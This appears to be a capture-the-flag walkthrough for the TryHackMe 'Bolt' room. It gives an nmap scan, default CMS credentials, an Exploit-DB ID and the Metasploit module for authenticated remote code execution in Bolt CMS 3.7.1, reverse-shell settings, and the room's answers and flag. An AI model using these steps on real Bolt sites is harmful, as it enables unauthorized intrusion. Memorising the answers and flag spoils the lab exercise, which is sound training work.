Room Link : https://tryhackme.com/r/room/bolt
STEP1
nmap -p- -sSV 10.10.174.222 -Pn -T4 -A
FINDING
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open http (PHP 7.2.32-1)
What port number has a web server with a CMS running?
8000
-------------------------------------------------------------------------------------------------
STEP2
http://10.10.174.222:8000/
FINDING
What is the username we can find in the CMS?
bolt
What is the password we can find for the username?
boltadmin123
-------------------------------------------------------------------------------------------------
STEP3
I tried to search on Google for the Bolt CMS default login page address.
ref : https://docs.boltcms.io/5.2/manual/login
http://10.10.174.222:8000/bolt
login
bolt -- boltadmin123
FINDING
What version of the CMS is installed on the server? (Ex: Name 1.1.1)
Bolt 3.7.1
Theres an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. Whats its EDB-ID?
48296
ref : https://www.exploit-db.com/exploits/48296
-------------------------------------------------------------------------------------------------
STEP4
service postgresql start && msfconsole -q
search exploit bolt
FINDING
Metasploit recently added an exploit module for this vulnerability. Whats the full path for this exploit? (Ex: exploit/....)
exploit/unix/webapp/bolt_authenticated_rce
-------------------------------------------------------------------------------------------------
STEP5
Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit
cd /home
cat flag.txt
FINDING
Look for flag.txt inside the machine.
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}
-------------------------------------------------------------------------------------------------
|